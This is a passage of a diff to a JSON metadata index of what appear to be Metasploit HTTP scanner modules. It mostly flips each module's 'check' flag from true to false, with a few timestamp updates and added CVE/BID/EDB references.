    "path": "/modules/auxiliary/scanner/http/hp_imc_som_file_download.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/hp_imc_som_file_download",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -25185,7 +25367,7 @@
    "path": "/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/hp_sitescope_getfileinternal_fileaccess",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -25234,7 +25416,7 @@
    "path": "/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/hp_sitescope_getsitescopeconfiguration",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -25283,7 +25465,7 @@
    "path": "/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/hp_sitescope_loadfilecontent_fileaccess",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -25329,7 +25511,7 @@
    "path": "/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/hp_sys_mgmt_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -25377,7 +25559,7 @@
    "path": "/modules/auxiliary/scanner/http/http_header.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/http_header",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -25423,7 +25605,7 @@
    "path": "/modules/auxiliary/scanner/http/http_hsts.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/http_hsts",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -25471,7 +25653,7 @@
    "path": "/modules/auxiliary/scanner/http/http_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/http_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -25519,7 +25701,7 @@
    "path": "/modules/auxiliary/scanner/http/http_put.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/http_put",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -25616,7 +25798,7 @@
    "path": "/modules/auxiliary/scanner/http/http_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/http_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -25662,7 +25844,7 @@
    "path": "/modules/auxiliary/scanner/http/http_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/http_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -25699,7 +25881,7 @@
    "path": "/modules/auxiliary/scanner/http/httpbl_lookup.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/httpbl_lookup",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -25767,7 +25949,9 @@
    ],
    "description": "Collect any leaked internal IPs by requesting commonly redirected locations from IIS.",
    "references": [
-
+      "CVE-2000-0649",
+      "BID-1499",
+      "EDB-20096"
    ],
    "platform": "",
    "arch": "",
@@ -25788,11 +25972,11 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-08-26 21:01:10 +0000",
+    "mod_time": "2019-12-08 16:15:48 +0000",
    "path": "/modules/auxiliary/scanner/http/iis_internal_ip.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/iis_internal_ip",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -25936,7 +26120,7 @@
    "path": "/modules/auxiliary/scanner/http/infovista_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/infovista_enum",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -25984,7 +26168,7 @@
    "path": "/modules/auxiliary/scanner/http/intel_amt_digest_bypass.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/intel_amt_digest_bypass",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -26030,7 +26214,7 @@
    "path": "/modules/auxiliary/scanner/http/ipboard_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/ipboard_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -26080,7 +26264,7 @@
    "path": "/modules/auxiliary/scanner/http/jboss_status.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/jboss_status",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -26131,7 +26315,7 @@
    "path": "/modules/auxiliary/scanner/http/jboss_vulnscan.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/jboss_vulnscan",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -26181,7 +26365,7 @@
    "path": "/modules/auxiliary/scanner/http/jenkins_command.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/jenkins_command",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -26227,7 +26411,7 @@
    "path": "/modules/auxiliary/scanner/http/jenkins_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/jenkins_enum",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -26274,7 +26458,7 @@
    "path": "/modules/auxiliary/scanner/http/jenkins_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/jenkins_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -26320,7 +26504,7 @@
    "path": "/modules/auxiliary/scanner/http/joomla_bruteforce_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/joomla_bruteforce_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -26366,7 +26550,7 @@
    "path": "/modules/auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/joomla_ecommercewd_sqli_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -26413,7 +26597,7 @@
    "path": "/modules/auxiliary/scanner/http/joomla_gallerywd_sqli_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/joomla_gallerywd_sqli_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -26459,7 +26643,7 @@
    "path": "/modules/auxiliary/scanner/http/joomla_pages.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/joomla_pages",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -26505,7 +26689,7 @@
    "path": "/modules/auxiliary/scanner/http/joomla_plugins.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/joomla_plugins",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -26551,7 +26735,7 @@
    "path": "/modules/auxiliary/scanner/http/joomla_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/joomla_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -26598,7 +26782,7 @@
    "path": "/modules/auxiliary/scanner/http/kodi_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/kodi_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -26645,7 +26829,7 @@
    "path": "/modules/auxiliary/scanner/http/linknat_vos_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/linknat_vos_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -26695,7 +26879,7 @@
    "path": "/modules/auxiliary/scanner/http/linksys_e1500_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/linksys_e1500_traversal",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -26745,7 +26929,7 @@
    "path": "/modules/auxiliary/scanner/http/litespeed_source_disclosure.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/litespeed_source_disclosure",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -26791,7 +26975,7 @@
    "path": "/modules/auxiliary/scanner/http/lucky_punch.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/lucky_punch",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -26841,7 +27025,7 @@
    "path": "/modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/majordomo2_directory_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -26887,7 +27071,7 @@
    "path": "/modules/auxiliary/scanner/http/manageengine_desktop_central_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/manageengine_desktop_central_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -26934,7 +27118,7 @@
    "path": "/modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/manageengine_deviceexpert_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -26983,7 +27167,7 @@
    "path": "/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/manageengine_deviceexpert_user_creds",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -27031,7 +27215,7 @@
    "path": "/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/manageengine_securitymanager_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -27081,7 +27265,7 @@
    "path": "/modules/auxiliary/scanner/http/mediawiki_svg_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/mediawiki_svg_fileaccess",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -27129,7 +27313,7 @@
    "path": "/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/meteocontrol_weblog_extractadmin",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -27175,7 +27359,7 @@
    "path": "/modules/auxiliary/scanner/http/mod_negotiation_brute.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/mod_negotiation_brute",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -27221,7 +27405,7 @@
    "path": "/modules/auxiliary/scanner/http/mod_negotiation_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/mod_negotiation_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -27272,7 +27456,7 @@
    "path": "/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/ms09_020_webdav_unicode_bypass",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -27372,7 +27556,7 @@
    "path": "/modules/auxiliary/scanner/http/mybook_live_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/mybook_live_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -27421,7 +27605,7 @@
    "path": "/modules/auxiliary/scanner/http/netdecision_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/netdecision_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -27470,7 +27654,7 @@
    "path": "/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/netgear_sph200d_traversal",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -27520,7 +27704,7 @@
    "path": "/modules/auxiliary/scanner/http/nginx_source_disclosure.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/nginx_source_disclosure",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -27567,7 +27751,7 @@
    "path": "/modules/auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/novell_file_reporter_fsfui_fileaccess",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -27615,7 +27799,7 @@
    "path": "/modules/auxiliary/scanner/http/novell_file_reporter_srs_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/novell_file_reporter_srs_fileaccess",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -27664,7 +27848,7 @@
    "path": "/modules/auxiliary/scanner/http/novell_mdm_creds.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/novell_mdm_creds",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -27710,7 +27894,7 @@
    "path": "/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/ntlm_info_enumeration",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -27756,7 +27940,7 @@
    "path": "/modules/auxiliary/scanner/http/octopusdeploy_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/octopusdeploy_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -27789,11 +27973,11 @@

    ],
    "targets": null,
-    "mod_time": "2019-04-25 20:43:55 +0000",
+    "mod_time": "2019-11-01 19:20:22 +0000",
    "path": "/modules/auxiliary/scanner/http/onion_omega2_login.py",
    "is_install_path": true,
    "ref_name": "scanner/http/onion_omega2_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -27840,7 +28024,7 @@
    "path": "/modules/auxiliary/scanner/http/open_proxy.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/open_proxy",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -27886,7 +28070,7 @@
    "path": "/modules/auxiliary/scanner/http/openmind_messageos_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/openmind_messageos_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -27937,7 +28121,7 @@
    "path": "/modules/auxiliary/scanner/http/options.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/options",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -27986,7 +28170,7 @@
    "path": "/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/oracle_demantra_database_credentials_leak",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -28035,7 +28219,7 @@
    "path": "/modules/auxiliary/scanner/http/oracle_demantra_file_retrieval.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/oracle_demantra_file_retrieval",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -28081,7 +28265,7 @@
    "path": "/modules/auxiliary/scanner/http/oracle_ilom_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/oracle_ilom_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -28118,7 +28302,7 @@
    "path": "/modules/auxiliary/scanner/http/owa_ews_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/owa_ews_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -28164,7 +28348,7 @@
    "path": "/modules/auxiliary/scanner/http/owa_iis_internal_ip.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/owa_iis_internal_ip",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -28218,7 +28402,7 @@
    "path": "/modules/auxiliary/scanner/http/owa_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/owa_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -28264,7 +28448,7 @@
    "path": "/modules/auxiliary/scanner/http/phpmyadmin_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/phpmyadmin_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -28310,7 +28494,7 @@
    "path": "/modules/auxiliary/scanner/http/pocketpad_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/pocketpad_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -28356,7 +28540,7 @@
    "path": "/modules/auxiliary/scanner/http/prev_dir_same_name_file.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/prev_dir_same_name_file",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -28402,7 +28586,7 @@
    "path": "/modules/auxiliary/scanner/http/radware_appdirector_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/radware_appdirector_enum",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -28449,7 +28633,7 @@
    "path": "/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/rails_json_yaml_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -28495,7 +28679,7 @@
    "path": "/modules/auxiliary/scanner/http/rails_mass_assignment.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/rails_mass_assignment",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -28543,7 +28727,7 @@
    "path": "/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/rails_xml_yaml_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -28589,7 +28773,7 @@
    "path": "/modules/auxiliary/scanner/http/replace_ext.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/replace_ext",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -28636,7 +28820,7 @@
    "path": "/modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/rewrite_proxy_bypass",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -28682,7 +28866,7 @@
    "path": "/modules/auxiliary/scanner/http/rfcode_reader_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/rfcode_reader_enum",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -28730,7 +28914,7 @@
    "path": "/modules/auxiliary/scanner/http/rips_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/rips_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -28777,7 +28961,7 @@
    "path": "/modules/auxiliary/scanner/http/riverbed_steelhead_vcx_file_read.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/riverbed_steelhead_vcx_file_read",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -28823,7 +29007,7 @@
    "path": "/modules/auxiliary/scanner/http/robots_txt.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/robots_txt",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -28871,7 +29055,7 @@
    "path": "/modules/auxiliary/scanner/http/s40_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/s40_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -28917,7 +29101,7 @@
    "path": "/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/sap_businessobjects_user_brute",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -28964,7 +29148,7 @@
    "path": "/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/sap_businessobjects_user_brute_web",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -29010,7 +29194,7 @@
    "path": "/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/sap_businessobjects_user_enum",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -29056,7 +29240,7 @@
    "path": "/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/sap_businessobjects_version_enum",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -29102,7 +29286,7 @@
    "path": "/modules/auxiliary/scanner/http/scraper.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/scraper",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -29148,7 +29332,7 @@
    "path": "/modules/auxiliary/scanner/http/sentry_cdu_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/sentry_cdu_enum",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -29194,7 +29378,7 @@
    "path": "/modules/auxiliary/scanner/http/servicedesk_plus_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/servicedesk_plus_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -29240,7 +29424,7 @@
    "path": "/modules/auxiliary/scanner/http/sevone_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/sevone_enum",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -29290,7 +29474,7 @@
    "path": "/modules/auxiliary/scanner/http/simple_webserver_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/simple_webserver_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -29340,7 +29524,7 @@
    "path": "/modules/auxiliary/scanner/http/smt_ipmi_49152_exposure.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/smt_ipmi_49152_exposure",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -29389,7 +29573,7 @@
    "path": "/modules/auxiliary/scanner/http/smt_ipmi_cgi_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/smt_ipmi_cgi_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -29428,7 +29612,7 @@
    "path": "/modules/auxiliary/scanner/http/smt_ipmi_static_cert_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/smt_ipmi_static_cert_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -29476,7 +29660,7 @@
    "path": "/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/smt_ipmi_url_redirect_traversal",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -29522,7 +29706,7 @@
    "path": "/modules/auxiliary/scanner/http/soap_xml.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/soap_xml",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -29569,7 +29753,7 @@
    "path": "/modules/auxiliary/scanner/http/sockso_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/sockso_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -29616,7 +29800,7 @@
    "path": "/modules/auxiliary/scanner/http/splunk_web_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/splunk_web_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -29664,7 +29848,7 @@
    "path": "/modules/auxiliary/scanner/http/springcloud_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/springcloud_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -29710,7 +29894,7 @@
    "path": "/modules/auxiliary/scanner/http/squid_pivot_scanning.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/squid_pivot_scanning",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -29757,7 +29941,7 @@
    "path": "/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/squiz_matrix_user_enum",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -29796,7 +29980,7 @@
    "path": "/modules/auxiliary/scanner/http/ssl.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/ssl",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -29844,7 +30028,7 @@
    "path": "/modules/auxiliary/scanner/http/ssl_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/ssl_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -29894,7 +30078,7 @@
    "path": "/modules/auxiliary/scanner/http/support_center_plus_directory_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/support_center_plus_directory_traversal",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -29986,7 +30170,7 @@
    "path": "/modules/auxiliary/scanner/http/svn_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/svn_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -30032,7 +30216,7 @@
    "path": "/modules/auxiliary/scanner/http/svn_wcdb_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/svn_wcdb_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -30082,7 +30266,7 @@
    "path": "/modules/auxiliary/scanner/http/sybase_easerver_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/sybase_easerver_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -30130,7 +30314,7 @@
    "path": "/modules/auxiliary/scanner/http/symantec_brightmail_ldapcreds.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/symantec_brightmail_ldapcreds",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -30181,7 +30365,7 @@
    "path": "/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/symantec_brightmail_logfile",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -30227,7 +30411,7 @@
    "path": "/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/symantec_web_gateway_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -30278,7 +30462,7 @@
    "path": "/modules/auxiliary/scanner/http/thinvnc_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/thinvnc_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -30324,7 +30508,7 @@
    "path": "/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/titan_ftp_admin_pwd",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -30370,7 +30554,7 @@
    "path": "/modules/auxiliary/scanner/http/title.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/title",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -30419,7 +30603,7 @@
    "path": "/modules/auxiliary/scanner/http/tomcat_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/tomcat_enum",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -30488,7 +30672,7 @@
    "path": "/modules/auxiliary/scanner/http/tomcat_mgr_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/tomcat_mgr_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -30588,7 +30772,7 @@
    "path": "/modules/auxiliary/scanner/http/tplink_traversal_noauth.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/tplink_traversal_noauth",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -30636,7 +30820,7 @@
    "path": "/modules/auxiliary/scanner/http/trace.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/trace",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -30682,7 +30866,7 @@
